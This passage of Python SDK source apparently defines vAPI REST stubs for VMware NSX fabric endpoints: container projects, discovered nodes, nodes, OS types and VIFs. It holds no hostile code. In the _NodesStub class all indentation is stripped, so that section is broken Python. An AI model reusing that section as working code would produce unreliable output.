class _ContainerProjectsStub(ApiInterfaceStub):
    def __init__(self, config):
        # Both operations on this interface declare the identical set of
        # standard vAPI errors; build a fresh mapping per operation so the
        # dict instances stay independent, exactly as the expanded form does.
        def _std_errors():
            return {
                'com.vmware.vapi.std.errors.' + suffix:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', cls)
                for suffix, cls in (
                    ('service_unavailable', 'ServiceUnavailable'),
                    ('invalid_request', 'InvalidRequest'),
                    ('internal_server_error', 'InternalServerError'),
                    ('unauthorized', 'Unauthorized'),
                    ('not_found', 'NotFound'),
                )
            }

        # --- get operation ------------------------------------------------
        get_input_type = type.StructType('operation-input', {
            'container_project_id': type.StringType(),
        })
        get_error_dict = _std_errors()
        get_input_value_validator_list = []
        get_output_validator_list = []
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/container-projects/{container-project-id}',
            path_variables={'container_project_id': 'container-project-id'},
            query_parameters={},
            content_type='application/json')

        # --- list operation -----------------------------------------------
        # Optional paging/filter fields; each one maps 1:1 onto a query
        # parameter of the same name.
        list_param_names = ('container_cluster_id', 'cursor',
                            'included_fields', 'page_size',
                            'sort_ascending', 'sort_by')
        list_input_type = type.StructType('operation-input', {
            'container_cluster_id': type.OptionalType(type.StringType()),
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = _std_errors()
        list_input_value_validator_list = []
        list_output_validator_list = []
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/container-projects',
            path_variables={},
            query_parameters={name: name for name in list_param_names},
            content_type='application/json')

        operations = {
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerProject'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerProjectListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'get': get_rest_metadata,
            'list': list_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.fabric.container_projects',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _DiscoveredNodesStub(ApiInterfaceStub):
    def __init__(self, config):
        # All five operations on this interface declare the identical set of
        # standard vAPI errors; build a fresh mapping per operation so the
        # dict instances stay independent, exactly as the expanded form does.
        def _std_errors():
            return {
                'com.vmware.vapi.std.errors.' + suffix:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', cls)
                for suffix, cls in (
                    ('service_unavailable', 'ServiceUnavailable'),
                    ('invalid_request', 'InvalidRequest'),
                    ('internal_server_error', 'InternalServerError'),
                    ('unauthorized', 'Unauthorized'),
                    ('not_found', 'NotFound'),
                )
            }

        # --- createtransportnode operation ---------------------------------
        createtransportnode_input_type = type.StructType('operation-input', {
            'node_ext_id': type.StringType(),
            'transport_node': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNode'),
        })
        createtransportnode_error_dict = _std_errors()
        createtransportnode_input_value_validator_list = [HasFieldsOfValidator()]
        createtransportnode_output_validator_list = [HasFieldsOfValidator()]
        createtransportnode_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/fabric/discovered-nodes/{node-ext-id}?action=create_transport_node',
            request_body_parameter='transport_node',
            path_variables={'node_ext_id': 'node-ext-id'},
            query_parameters={},
            content_type='application/json')

        # --- get operation -------------------------------------------------
        get_input_type = type.StructType('operation-input', {
            'node_ext_id': type.StringType(),
        })
        get_error_dict = _std_errors()
        get_input_value_validator_list = []
        get_output_validator_list = []
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/discovered-nodes/{node-ext-id}',
            path_variables={'node_ext_id': 'node-ext-id'},
            query_parameters={},
            content_type='application/json')

        # --- hostprep operation --------------------------------------------
        hostprep_input_type = type.StructType('operation-input', {
            'node_ext_id': type.StringType(),
        })
        hostprep_error_dict = _std_errors()
        hostprep_input_value_validator_list = []
        hostprep_output_validator_list = [HasFieldsOfValidator()]
        hostprep_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/fabric/discovered-nodes/{node-ext-id}?action=hostprep',
            path_variables={'node_ext_id': 'node-ext-id'},
            query_parameters={},
            content_type='application/json')

        # --- list operation ------------------------------------------------
        # Optional filter/paging fields; each one maps 1:1 onto a query
        # parameter of the same name.  All are strings except page_size
        # (integer) and sort_ascending (boolean), which are patched below.
        list_param_names = (
            'cm_local_id', 'cursor', 'display_name', 'external_id',
            'has_parent', 'included_fields', 'ip_address', 'node_id',
            'node_type', 'origin_id', 'page_size',
            'parent_compute_collection', 'sort_ascending', 'sort_by')
        list_fields = {name: type.OptionalType(type.StringType())
                       for name in list_param_names}
        list_fields['page_size'] = type.OptionalType(type.IntegerType())
        list_fields['sort_ascending'] = type.OptionalType(type.BooleanType())
        list_input_type = type.StructType('operation-input', list_fields)
        list_error_dict = _std_errors()
        list_input_value_validator_list = []
        list_output_validator_list = []
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/discovered-nodes',
            path_variables={},
            query_parameters={name: name for name in list_param_names},
            content_type='application/json')

        # --- reapplyclusterconfig operation --------------------------------
        reapplyclusterconfig_input_type = type.StructType('operation-input', {
            'node_ext_id': type.StringType(),
        })
        reapplyclusterconfig_error_dict = _std_errors()
        reapplyclusterconfig_input_value_validator_list = []
        reapplyclusterconfig_output_validator_list = [HasFieldsOfValidator()]
        reapplyclusterconfig_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/fabric/discovered-nodes/{node-ext-id}?action=reapply_cluster_config',
            path_variables={'node_ext_id': 'node-ext-id'},
            query_parameters={},
            content_type='application/json')

        operations = {
            'createtransportnode': {
                'input_type': createtransportnode_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNode'),
                'errors': createtransportnode_error_dict,
                'input_value_validator_list': createtransportnode_input_value_validator_list,
                'output_validator_list': createtransportnode_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'DiscoveredNode'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'hostprep': {
                'input_type': hostprep_input_type,
                'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
                'errors': hostprep_error_dict,
                'input_value_validator_list': hostprep_input_value_validator_list,
                'output_validator_list': hostprep_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'DiscoveredNodeListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'reapplyclusterconfig': {
                'input_type': reapplyclusterconfig_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNode'),
                'errors': reapplyclusterconfig_error_dict,
                'input_value_validator_list': reapplyclusterconfig_input_value_validator_list,
                'output_validator_list': reapplyclusterconfig_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'createtransportnode': createtransportnode_rest_metadata,
            'get': get_rest_metadata,
            'hostprep': hostprep_rest_metadata,
            'list': list_rest_metadata,
            'reapplyclusterconfig': reapplyclusterconfig_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.fabric.discovered_nodes',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _NodesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'node': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/nodes',
request_body_parameter='node',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for create_0 operation
create_0_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
create_0_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_0_input_value_validator_list = [
]
create_0_output_validator_list = [
]
create_0_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/nodes/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'node_id': type.StringType(),
'unprepare_host': type.OptionalType(type.BooleanType()),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/fabric/nodes/{node-id}',
path_variables={
'node_id': 'node-id',
},
query_parameters={
'unprepare_host': 'unprepare_host',
},
content_type='application/json'
)
# properties for delete_0 operation
delete_0_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
delete_0_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_0_input_value_validator_list = [
]
delete_0_output_validator_list = [
]
delete_0_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/fabric/nodes/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'node_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/nodes/{node-id}',
path_variables={
'node_id': 'node-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get_0 operation
get_0_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
get_0_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_0_input_value_validator_list = [
]
get_0_output_validator_list = [
]
get_0_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/nodes/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'discovered_node_id': type.OptionalType(type.StringType()),
'display_name': type.OptionalType(type.StringType()),
'external_id': type.OptionalType(type.StringType()),
'hardware_id': type.OptionalType(type.StringType()),
'hypervisor_os_type': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'ip_address': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'resource_type': type.OptionalType(type.StringType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/nodes',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'discovered_node_id': 'discovered_node_id',
'display_name': 'display_name',
'external_id': 'external_id',
'hardware_id': 'hardware_id',
'hypervisor_os_type': 'hypervisor_os_type',
'included_fields': 'included_fields',
'ip_address': 'ip_address',
'page_size': 'page_size',
'resource_type': 'resource_type',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for performaction operation
performaction_input_type = type.StructType('operation-input', {
'node_id': type.StringType(),
'action': type.OptionalType(type.StringType()),
'evacuate_powered_off_vms': type.OptionalType(type.BooleanType()),
'vsan_mode': type.OptionalType(type.StringType()),
})
performaction_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
performaction_input_value_validator_list = [
]
performaction_output_validator_list = [
HasFieldsOfValidator()
]
performaction_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/nodes/{node-id}',
path_variables={
'node_id': 'node-id',
},
query_parameters={
'action': 'action',
'evacuate_powered_off_vms': 'evacuate_powered_off_vms',
'vsan_mode': 'vsan_mode',
},
content_type='application/json'
)
# properties for restartinventorysync operation
restartinventorysync_input_type = type.StructType('operation-input', {
'node_id': type.StringType(),
})
restartinventorysync_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
restartinventorysync_input_value_validator_list = [
]
restartinventorysync_output_validator_list = [
]
restartinventorysync_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/nodes/{node-id}?action=restart_inventory_sync',
path_variables={
'node_id': 'node-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'node_id': type.StringType(),
'node': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/fabric/nodes/{node-id}',
request_body_parameter='node',
path_variables={
'node_id': 'node-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for update_0 operation
update_0_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
update_0_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_0_input_value_validator_list = [
]
update_0_output_validator_list = [
]
update_0_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/fabric/nodes/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
# properties for upgradeinfra operation
upgradeinfra_input_type = type.StructType('operation-input', {
'node_id': type.StringType(),
'disable_vm_migration': type.OptionalType(type.BooleanType()),
})
upgradeinfra_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
upgradeinfra_input_value_validator_list = [
]
upgradeinfra_output_validator_list = [
HasFieldsOfValidator()
]
upgradeinfra_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/nodes/{node-id}?action=upgrade_infra',
path_variables={
'node_id': 'node-id',
},
query_parameters={
'disable_vm_migration': 'disable_vm_migration',
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'create_0': {
'input_type': create_0_input_type,
'output_type': type.VoidType(),
'errors': create_0_error_dict,
'input_value_validator_list': create_0_input_value_validator_list,
'output_validator_list': create_0_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'delete_0': {
'input_type': delete_0_input_type,
'output_type': type.VoidType(),
'errors': delete_0_error_dict,
'input_value_validator_list': delete_0_input_value_validator_list,
'output_validator_list': delete_0_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'get_0': {
'input_type': get_0_input_type,
'output_type': type.VoidType(),
'errors': get_0_error_dict,
'input_value_validator_list': get_0_input_value_validator_list,
'output_validator_list': get_0_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NodeListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'performaction': {
'input_type': performaction_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
'errors': performaction_error_dict,
'input_value_validator_list': performaction_input_value_validator_list,
'output_validator_list': performaction_output_validator_list,
'task_type': TaskType.NONE,
},
'restartinventorysync': {
'input_type': restartinventorysync_input_type,
'output_type': type.VoidType(),
'errors': restartinventorysync_error_dict,
'input_value_validator_list': restartinventorysync_input_value_validator_list,
'output_validator_list': restartinventorysync_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
'update_0': {
'input_type': update_0_input_type,
'output_type': type.VoidType(),
'errors': update_0_error_dict,
'input_value_validator_list': update_0_input_value_validator_list,
'output_validator_list': update_0_output_validator_list,
'task_type': TaskType.NONE,
},
'upgradeinfra': {
'input_type': upgradeinfra_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
'errors': upgradeinfra_error_dict,
'input_value_validator_list': upgradeinfra_input_value_validator_list,
'output_validator_list': upgradeinfra_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'create_0': create_0_rest_metadata,
'delete': delete_rest_metadata,
'delete_0': delete_0_rest_metadata,
'get': get_rest_metadata,
'get_0': get_0_rest_metadata,
'list': list_rest_metadata,
'performaction': performaction_rest_metadata,
'restartinventorysync': restartinventorysync_rest_metadata,
'update': update_rest_metadata,
'update_0': update_0_rest_metadata,
'upgradeinfra': upgradeinfra_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.nodes',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _OstypesStub(ApiInterfaceStub):
    """Stub for the ``com.vmware.nsx.fabric.ostypes`` interface.

    Exposes a single ``get`` operation (GET /api/v1/fabric/ostypes) that
    returns the supported host OS list.
    """
    def __init__(self, config):
        # -- 'get' operation -------------------------------------------------
        # The operation takes no input fields.
        get_input_type = type.StructType('operation-input', {})

        # Standard vAPI error mapping: fully-qualified error id -> binding
        # type declared in com.vmware.vapi.std.errors_client.  Built from a
        # (suffix, binding-class) table instead of a literal dict.
        get_error_dict = {
            'com.vmware.vapi.std.errors.' + err_suffix:
                type.ReferenceType('com.vmware.vapi.std.errors_client', binding)
            for err_suffix, binding in (
                ('service_unavailable', 'ServiceUnavailable'),
                ('invalid_request', 'InvalidRequest'),
                ('internal_server_error', 'InternalServerError'),
                ('unauthorized', 'Unauthorized'),
                ('not_found', 'NotFound'),
            )
        }
        get_input_value_validator_list = []
        get_output_validator_list = []

        # Plain GET with neither path variables nor query parameters.
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/ostypes',
            path_variables={},
            query_parameters={},
            content_type='application/json'
        )

        operations = {
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType(
                    'com.vmware.nsx.model_client', 'SupportedHostOSListResult'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {'get': get_rest_metadata}

        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.fabric.ostypes',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _VifsStub(ApiInterfaceStub):
    """Stub for the ``com.vmware.nsx.fabric.vifs`` interface.

    Exposes a single ``list`` operation (GET /api/v1/fabric/vifs) that
    returns virtual network interfaces with the usual NSX paging and
    filtering parameters.
    """
    def __init__(self, config):
        # -- 'list' operation --------------------------------------------------
        # Every input field is optional: mostly string filters, plus an
        # integer page size and a boolean sort direction.  Field order is
        # kept identical to the generated original.
        _optional = type.OptionalType
        list_input_type = type.StructType('operation-input', {
            'cursor': _optional(type.StringType()),
            'host_id': _optional(type.StringType()),
            'included_fields': _optional(type.StringType()),
            'lport_attachment_id': _optional(type.StringType()),
            'owner_vm_id': _optional(type.StringType()),
            'page_size': _optional(type.IntegerType()),
            'sort_ascending': _optional(type.BooleanType()),
            'sort_by': _optional(type.StringType()),
            'vm_id': _optional(type.StringType()),
        })

        # Standard vAPI error mapping: fully-qualified error id -> binding
        # type declared in com.vmware.vapi.std.errors_client.
        list_error_dict = {
            'com.vmware.vapi.std.errors.' + err_suffix:
                type.ReferenceType('com.vmware.vapi.std.errors_client', binding)
            for err_suffix, binding in (
                ('service_unavailable', 'ServiceUnavailable'),
                ('invalid_request', 'InvalidRequest'),
                ('internal_server_error', 'InternalServerError'),
                ('unauthorized', 'Unauthorized'),
                ('not_found', 'NotFound'),
            )
        }
        list_input_value_validator_list = []
        list_output_validator_list = []

        # Each input field maps 1:1 onto a query parameter of the same name.
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/vifs',
            path_variables={},
            query_parameters={name: name for name in (
                'cursor',
                'host_id',
                'included_fields',
                'lport_attachment_id',
                'owner_vm_id',
                'page_size',
                'sort_ascending',
                'sort_by',
                'vm_id',
            )},
            content_type='application/json'
        )

        operations = {
            'list': {
                'input_type': list_input_type,
